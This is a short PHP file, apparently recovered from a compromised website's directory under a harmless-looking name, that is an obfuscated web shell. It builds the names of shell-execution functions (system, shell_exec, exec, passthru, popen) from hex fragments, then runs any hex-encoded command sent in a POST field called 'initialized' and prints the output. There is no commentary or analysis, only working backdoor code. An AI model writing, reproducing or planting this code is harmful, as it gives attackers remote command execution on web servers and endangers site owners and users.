/home/ramtczxy/exoticcockatoos.com/function.embed.php
<?php
$symbol1 = '73';
$symbol2 = '79';
$symbol3 = '68';
$symbol4 = '65';
$symbol5 = '78';
$symbol6 = '74';
$symbol7 = '70';
$symbol8 = '6e';
$symbol9 = '5f';
$symbol10 = '63';
$symbol11 = '6f';
$symbol12 = '69';
$symbol13 = '61';
$symbol14 = '6c';
$symbol15 = '7a';
$symbol16 = '64';
$reverse_lookup1 = pack("H*", $symbol1.$symbol2.$symbol1.'74'.'65'.'6d');
$reverse_lookup2 = pack("H*", $symbol1.$symbol3.$symbol4.'6c'.'6c'.'5f'.'65'.'78'.'65'.'63');
$reverse_lookup3 = pack("H*", '65'.$symbol5.$symbol4.'63');
$reverse_lookup4 = pack("H*", '70'.'61'.'73'.'73'.$symbol6.$symbol3.'72'.'75');
$reverse_lookup5 = pack("H*", '70'.'6f'.$symbol7.$symbol4.$symbol8);
$reverse_lookup6 = pack("H*", $symbol1.'74'.'72'.$symbol4.'61'.'6d'.$symbol9.'67'.$symbol4.'74'.$symbol9.$symbol10.'6f'.$symbol8.$symbol6.'65'.$symbol8.$symbol6.'73');
$reverse_lookup7 = pack("H*", '70'.'63'.'6c'.$symbol11.$symbol1.$symbol4);
$initialized = pack("H*", '69'.'6e'.$symbol12.$symbol6.'69'.$symbol13.$symbol14.$symbol12.$symbol15.'65'.$symbol16);
if (isset($_POST[$initialized])) {
$initialized = pack("H*", $_POST[$initialized]);
if (function_exists($reverse_lookup1)) {
$reverse_lookup1($initialized);
} elseif (function_exists($reverse_lookup2)) {
print $reverse_lookup2($initialized);
} elseif (function_exists($reverse_lookup3)) {
$reverse_lookup3($initialized, $ptr_ref);
print join("\n", $ptr_ref);
} elseif (function_exists($reverse_lookup4)) {
$reverse_lookup4($initialized);
} elseif (function_exists($reverse_lookup5) && function_exists($reverse_lookup6) && function_exists($reverse_lookup7)) {
$rec_flag = $reverse_lookup5($initialized, 'r');
if ($rec_flag) {
$pointer_k = $reverse_lookup6($rec_flag);
$reverse_lookup7($rec_flag);
print $pointer_k;
}
}
exit;
}